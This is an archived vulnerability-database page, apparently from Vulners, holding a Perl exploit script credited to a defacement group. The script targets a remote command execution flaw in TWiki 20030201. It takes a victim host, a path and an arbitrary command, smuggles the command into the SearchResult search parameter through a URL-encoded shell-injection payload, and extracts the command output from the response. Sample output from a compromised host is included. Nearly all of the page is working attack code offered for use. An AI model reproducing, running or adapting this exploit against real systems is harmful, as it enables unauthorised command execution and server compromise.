Vulners
Lucene search
twiki20030201.pl.txt
`#!/usr/bin/perl
#
# TWiki 20030201 VIEW string remote command execution
vulnerability
#
# Exploit coded by runvirus GeekZ[at]WorldDefacers[d0t]NeT
#
#
# [root@localhost perls]$ perl twikiview.pl -h www.victim.com
-p twiki/bin/view/TWiki/ -c "uname -a;id"
#
#
# -=[ TWiki :- view string remote command execution exploit
]=-
# -=[ Coded by rUnViRuS
]=-
# -=[ HOST:- www.worlddefacers.net www.secuirty-arab.com
]=-
#
# bash-2.05b --> uname -a;id
#
# Linux infong225 2.4.28-grsec-20050113a #1 SMP Thu Jan 13
08:59:31 CET 2005 i686 unknown
# uid=16704(u36561933) gid=600(ftpusers)
#
#
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
###################################################################
########################
use Net::HTTP;
use Getopt::Std; getopts('h:p:c:', \%args);
if (defined($args{'h'})) { $host = $args{'h'}; }
if (defined($args{'p'})) { $path = $args{'p'}; }
if (defined($args{'c'})) { $thecmd = $args{'c'};}else{$thecmd = "
uname -a;id";}
print STDERR "\n-=[ TWiki 20030201 VIEW string remote command
execution vulnerability ]=-\n";
print STDERR "-=[ HOST:- www.worlddefacers.net www.secuirty-
arab.com ]=-\n";
print STDERR "-=[ Coded by rUnViRuS
]=-\n\n";
if ((!defined($host)) || (!defined($path))) {
Usage();
}
print "bash-2.05b --> $thecmd\n\n";
my $s = Net::HTTP->new(Host => "$host") || die $@;
my $thecmd=URLEncode($thecmd);
my $count=0;
my $skip=0;
my $buf2;
my $exploit="?topic=doesnotexist1%27%3B+%28$thecmd%29+%7C+sed+%27
s%2F%5C%28.*%5C%29%2F__BEGIN__%5C1__END__.txt%2F%27%3B+fgrep+-i+-l
+--+%27doesnotexist2";
$s->write_request(GET => $path . "SearchResult?search=" .
$exploit, 'User-Agent' => "Mozilla/5.0");
my($code, $mess, %h) = $s->read_response_headers;
# ..,,;:: Procedura di parsing
while (1) {
my $buf;
my $n = $s->read_entity_body($buf, 1024);
die "read failed: $!" unless defined $n;
last unless $n;
$buf2 = $buf2 . $buf;
}
while (index($buf2,"__BEGIN__",$skip) != -1) {
$from = index($buf2,"__BEGIN__",$skip);
$count = $count +1;
$from = $from + 9;
$to = index($buf2,"__END__",$skip);
$skip = $to+7;
$chars = $to - $from;
$grab = substr($buf2, $from, $chars);
if (($grab ne $oldgrab) && ($count != 1)){
print "$grab\n";
}
$oldgrab = $grab;
}
if ( $count <= 1 ){
print "Host not vulnerable\n";
}
# ..,,;:: Procedura di encoding strarippata da snooq
sub URLEncode {
my $theURL=$_[0];
$theURL=~ s/([\W])/"%".uc(sprintf("%2.2x",ord($1)))/eg;
return $theURL;
}
sub Usage {
print STDERR "-=[ Options: twikiview.pl -h www.exmpl.com -p
]=-
-=[ -h Victim host .
]=-
-=[ -p Twiki path.
]=-
-=[ -c Command.
]=-\n\n";
exit;
}
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
08 Nov 2005 00:00Current
0.1Low risk
Vulners AI Score0.1